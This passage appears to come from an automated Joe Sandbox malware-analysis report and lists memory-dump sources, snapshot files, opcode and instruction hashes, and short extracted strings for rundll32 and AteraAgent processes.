                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d507b3b4081015e82acd12abbf821ea733552f7646fd0c1326030a0aab883755
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01AD32B00216A7FB18AAA985593EE37E79BC8714F254029C002F3380CEB96D07E794
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 69d1790a7f620dafa8b7f0fea1935bf675812a1ccc5316965b331c4ce6a1574f
                                                                                                                                                                                                                                          • Instruction ID: 1431a08a0858c1ceccbdeba547eb75785029616629f9cd7c6e48be05da43a865
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69d1790a7f620dafa8b7f0fea1935bf675812a1ccc5316965b331c4ce6a1574f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5014C75A002109FCB18AFB8D4056AA3BB5EB88711B105079D509DB364EF359D028BC0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9aa108408316c37bfdae93fc91648eab0d2f986996bd1a5d05b157bab3b91fc6
                                                                                                                                                                                                                                          • Instruction ID: 46dc52b6c903fd6a6729568fc5feece8737fe26fc5a931f45dcd7e6f35838713
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa108408316c37bfdae93fc91648eab0d2f986996bd1a5d05b157bab3b91fc6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F0A439240300ABEB19AFB0EA047593B96EBC5211B044879E1018F291DF76EC498BD1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 265a9f1849a16e52469e216b88d059e9780ebe9d696ef62a25f67d66907b21ea
                                                                                                                                                                                                                                          • Instruction ID: 092229fb865f9820a2cf88417234d1f3831ab180f8074d7670b5931de2e88700
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 265a9f1849a16e52469e216b88d059e9780ebe9d696ef62a25f67d66907b21ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10014B75A002149FCB18AB78D4057AE3BF9EB88610B101469E509DB354EF359D02CBC0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7f651242044fa9345efa977f92b7f54ad685a9b1b7f0ee799e8a3b7225479faa
                                                                                                                                                                                                                                          • Instruction ID: 046f5475f2ef7abc4707dc535953ba60c970f4c8f91cf290746758d5ead1d7bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f651242044fa9345efa977f92b7f54ad685a9b1b7f0ee799e8a3b7225479faa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46F0C26CE002066FEB185E74616A3153BD7EBD4251319082ECA46CF190ED28ED0583D1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f8d15a7a2fdcb21bd29416bd75a06cd589ba4568e5b2bec29a54c668da9264ff
                                                                                                                                                                                                                                          • Instruction ID: d4c1f31547ace41c524e70d6c3200746982c29c8db6ce4b3ef0c9ae1d416a271
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8d15a7a2fdcb21bd29416bd75a06cd589ba4568e5b2bec29a54c668da9264ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF0B43D3003006BEB18ABB0EA0575A3B9BEBC02017048838E1028F291DF76FC499BD1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 7J8$(7J8$(7J8$07J8$0WO$0WO$87J8$@7J8$H7J8$P7J8$X7J8$x6J8$x6J8$x6J8$x6J8$x6J8$x6J8$x6J8$/E$/E$/E$/E$/E$/E$/E$6J8$6J8$6J8$6J8$6J8
                                                                                                                                                                                                                                          • API String ID: 0-1156071672
                                                                                                                                                                                                                                          • Opcode ID: 1718fa0bdeb3dc455ec833d9f3a36ce15e8b5060ba0756402e0e6d8d497ab646
                                                                                                                                                                                                                                          • Instruction ID: 25e89861ec68837d310a671a109fb8ef46a9e25fedd7dbdd73a3812e2d6e3634
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1718fa0bdeb3dc455ec833d9f3a36ce15e8b5060ba0756402e0e6d8d497ab646
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F034C70D0961A8FDB99EB28C494BB8B7B5FF5A340F1440F9D00ED7292DA39A985CF50
Memory Dump Source
• Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          • API String ID: 0-3680607079
                                                                                                                                                                                                                                          • Opcode ID: ec03bf07b23545d03b48669ede93d0b7d151db4b711a6f49602548b752c5ce84
                                                                                                                                                                                                                                          • Instruction ID: 7d65a061aca9ee5e0e058deef018758abe86f047290aaa680c4515f9510def17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec03bf07b23545d03b48669ede93d0b7d151db4b711a6f49602548b752c5ce84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F13A57B0DA928BE310A77CF8621F9BB54DF863A570881B7D18DCB0E3DC18644A86D5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: h7J8$h7J8$p7J8
                                                                                                                                                                                                                                          • API String ID: 0-642860734
                                                                                                                                                                                                                                          • Opcode ID: ac1eb36c2d080ee9961750a4d5f23434e77e138d3989e091082569c0402a0db9
                                                                                                                                                                                                                                          • Instruction ID: 9c8b71d658555109956386a3fadeab37e3df7e25c741260db81c5160e8954a8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac1eb36c2d080ee9961750a4d5f23434e77e138d3989e091082569c0402a0db9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDA14F70909A9ECFDBA5DB28C4507ACB7B1FF5A340F1481BAC00ED7292DB795986CB40
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x6J8$x6J8$7J8
                                                                                                                                                                                                                                          • API String ID: 0-3843502153
                                                                                                                                                                                                                                          • Opcode ID: cd7f9a2f250ce7b601f01c938f5d84ed2fa75da6ecfd4cf86e781ce68d272dcb
                                                                                                                                                                                                                                          • Instruction ID: f569e21b74cb3f8c320cfbc89ea2fd75975e04ed133ce942a4006b360ccb0002
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd7f9a2f250ce7b601f01c938f5d84ed2fa75da6ecfd4cf86e781ce68d272dcb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A041937190DA8D8FDB59EB68C4617E8BBB1EF5A340F0440BAC04ED7293DE385985CB41
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: N_^$N_^
                                                                                                                                                                                                                                          • API String ID: 0-324526423
                                                                                                                                                                                                                                          • Opcode ID: fb76c5975caf0b0ce21f1b0384ebda4537089b6fe9096b8b8bc51ecc674f50ae
                                                                                                                                                                                                                                          • Instruction ID: 07b61ce6d1345b04139aadfac0b6e93d98f682647dece595192f71918e5ef190
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb76c5975caf0b0ce21f1b0384ebda4537089b6fe9096b8b8bc51ecc674f50ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9D1473394D6964FE311B778E8611F87BA4DF46261B0845BBC18ECA0E3E80C548B8BD5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: `7J8$`7J8
                                                                                                                                                                                                                                          • API String ID: 0-837284442
                                                                                                                                                                                                                                          • Opcode ID: 09f00eeccd96814b6bac635040435a8ef9dc0a998d65049575b682b3079256f1
                                                                                                                                                                                                                                          • Instruction ID: 3e2ee13d97961c2c738557e632296ecf1f62c585131fbd5b4db133aa74219144
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f00eeccd96814b6bac635040435a8ef9dc0a998d65049575b682b3079256f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05B1F16790D2924BE301B7BCF4A15F97BA5DF86239B0C45B3D18D8D0D3DD18648F8A98
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: c$N_^
                                                                                                                                                                                                                                          • API String ID: 0-768855989
                                                                                                                                                                                                                                          • Opcode ID: e2afa651b55c8e5a0d429bfea96460f9570030c85d36a8fce8a97058be8fa70e
                                                                                                                                                                                                                                          • Instruction ID: f272d6cba8a6adfae3391e57be2f4d5c7ab595fb137aa151744de696e93b93ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2afa651b55c8e5a0d429bfea96460f9570030c85d36a8fce8a97058be8fa70e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D91C667A4D6A64BE31173BCF8621F87B94CF462B5B0C45B7D28DC90A3DC08148F8AD5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: @8J8$H8J8
                                                                                                                                                                                                                                          • API String ID: 0-82617017
                                                                                                                                                                                                                                          • Opcode ID: 6ff441f3009cef231ddaa871cd7433d53437fe4930f8b7bf7ed30fa2c3fed313
                                                                                                                                                                                                                                          • Instruction ID: 62f938d96d95b9bfd974c9d817b65ce87cd75335fef616c94cef08d841e654cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff441f3009cef231ddaa871cd7433d53437fe4930f8b7bf7ed30fa2c3fed313
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DB19270A18A5D8FDB94EF58C894BA8B7F1FF69301F0441AAD00DE7262DA74A985CB40
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8J8$(8J8
                                                                                                                                                                                                                                          • API String ID: 0-1672074270
                                                                                                                                                                                                                                          • Opcode ID: 764eab24ec4f68891e7a8a31b095242095b498bfc6633610bcdeb7c95d956341
                                                                                                                                                                                                                                          • Instruction ID: 07fc7295626a78622c9c47ac92b9d19123847d0ad33aabafb6b21b05dc074018
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 764eab24ec4f68891e7a8a31b095242095b498bfc6633610bcdeb7c95d956341
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98410670D1991EDFDB84EBA8C494AACF7B5FF5A340F544479D00ED72A2DA38A885CB40
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1451671879.00007FFAAB650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB650000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab650000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 73dfd433c1631aee8f946c37359c27910b98728dff9d03f08ae6d09164a02912
                                                                                                                                                                                                                                          • Instruction ID: 0b768a427ca0f39441c74524458ab56031e623df658ef80e73e0e40cb12ebca6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73dfd433c1631aee8f946c37359c27910b98728dff9d03f08ae6d09164a02912
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F1F330B0DA898FE799D72C88656747BD1EF5B310B1442BED08EC72A3DD29EC468781
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1451671879.00007FFAAB650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB650000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab650000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E
                                                                                                                                                                                                                                          • API String ID: 0-2597168574
                                                                                                                                                                                                                                          • Opcode ID: 0f702d83c07c2aeac18f63afad990b01e2ff5daafdf3b3a227e8cdb74403007e
                                                                                                                                                                                                                                          • Instruction ID: 3262c65f9c0b8a0e475953aa310e4f3b4fd8a20c385596fc654e531cc51a751a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f702d83c07c2aeac18f63afad990b01e2ff5daafdf3b3a227e8cdb74403007e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E51C371B1CA0C8FD758DB1CD895A75B7E1FB99750B0542BEE44EC3266CE24EC128781
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x6J8
                                                                                                                                                                                                                                          • API String ID: 0-2378027356
                                                                                                                                                                                                                                          • Opcode ID: 7b09191586e71ad166909556a39ac5df0632f728e3cc9d038986abc1109ac077
                                                                                                                                                                                                                                          • Instruction ID: a260cfcb1f406602d1f187026b5053560f6729bd5b46401510cc17063b76ce77
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b09191586e71ad166909556a39ac5df0632f728e3cc9d038986abc1109ac077
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C419270909A8D8FDB45DB68C4506EDBBF1EF5A340F0841B6D449DB2A2DA3C588ACB50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x7J8
                                                                                                                                                                                                                                          • API String ID: 0-2357181291
                                                                                                                                                                                                                                          • Opcode ID: d0562444354705faafd03475347140bdcf548fca211ab6bfc465d22ba8f7fcb1
                                                                                                                                                                                                                                          • Instruction ID: b4056a8df8ac83f4204ef5a94147d70db5ee1ccf7d92dae863836dbd28738e00
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0562444354705faafd03475347140bdcf548fca211ab6bfc465d22ba8f7fcb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB31223060964ECFDB84EF68C451AA9B3E2FF5A340F558579D40DC7296DE39A846CB40
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: h\J8
                                                                                                                                                                                                                                          • API String ID: 0-2565130293
                                                                                                                                                                                                                                          • Opcode ID: 21614f637ebe6a724d124dc99efecdc849400d7b1f8c8685e6137ef063ffb1d1
                                                                                                                                                                                                                                          • Instruction ID: c92daf60def544d8d9efd1b26f2de2ad022e8b072d1f57168cdac4419b970f0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21614f637ebe6a724d124dc99efecdc849400d7b1f8c8685e6137ef063ffb1d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911A031D0C68A8BEB00DBA8C4556EDFBF5FF46340F0545B9E10AD7192DF2865498B81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 957a39395f4aa1cd1ef6d0ecd1eeb9a2d152ae389faf096c44cf582f8b00c8a0
                                                                                                                                                                                                                                          • Instruction ID: 8679930678ee07b6d28e1ef1300b7e0638316c698629232ceeeed5f8855db86b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 957a39395f4aa1cd1ef6d0ecd1eeb9a2d152ae389faf096c44cf582f8b00c8a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3D1DA30508A8E8FEBA8DF28CC567E977D1FF55300F04826EE84EC7292CB7598458B81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 49315c21d09cee9d451a6755aa82351097283985d03b4a8949052d52570acdb7
                                                                                                                                                                                                                                          • Instruction ID: 48d02c31d5583fb08bac85825c5b860a2ec1c7c5c79318a17cfc640829fefac8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49315c21d09cee9d451a6755aa82351097283985d03b4a8949052d52570acdb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65C11B6180E68B8FE795DB7888656E57BE4EF56390F0C41FDC44ECB1E3E928984987C0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7ad8924cf64e961d4b146d623b6bec5450411b1a74e237a13c3b050ee129b95b
                                                                                                                                                                                                                                          • Instruction ID: b449bbc6d4d44b0bdbc51b20eefd7200a57ee5af138b8e30a6f30df5a054eaaf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ad8924cf64e961d4b146d623b6bec5450411b1a74e237a13c3b050ee129b95b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1B1B570509A4E8FEB68DF28C8557E97BD1FF56350F04826EE84EC7292CB7498458BC2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 659bc996e61daf1a0f74335d11c11ceb6107222398a3953929a97bc1521b719a
                                                                                                                                                                                                                                          • Instruction ID: 74940c8b1f2282deaa3e51adfdfe5b824e7e211c846a566f9cb80856dd9f620d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 659bc996e61daf1a0f74335d11c11ceb6107222398a3953929a97bc1521b719a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24517071908A0C8FDB68DB68D855BE9BBF1FB59310F0482AAD44DD3252DE34A985CF81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1451671879.00007FFAAB650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB650000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab650000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0WO$0WO$/E$/E$/E$/E$/E$/E$/E
                                                                                                                                                                                                                                          • API String ID: 0-1916050242
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$6E$6E$8hG$8hG$\
                                                                                                                                                                                                                                          • API String ID: 0-3534639814
                                                                                                                                                                                                                                          • Opcode ID: 5d2b1d8c9f1dc25ec03826d0bcb82711c1b01191d9f7ecab4e009daca890e8e1
                                                                                                                                                                                                                                          • Instruction ID: cd841152e3497cc4fbc6537dd5103bc7508b6cb97c0d3a4d72dd5ab0eb3e2b68
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d2b1d8c9f1dc25ec03826d0bcb82711c1b01191d9f7ecab4e009daca890e8e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A526870A1DB468FE768DB28849967577D5EF9A340F04807ED48FC32A3DD28B84A87C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
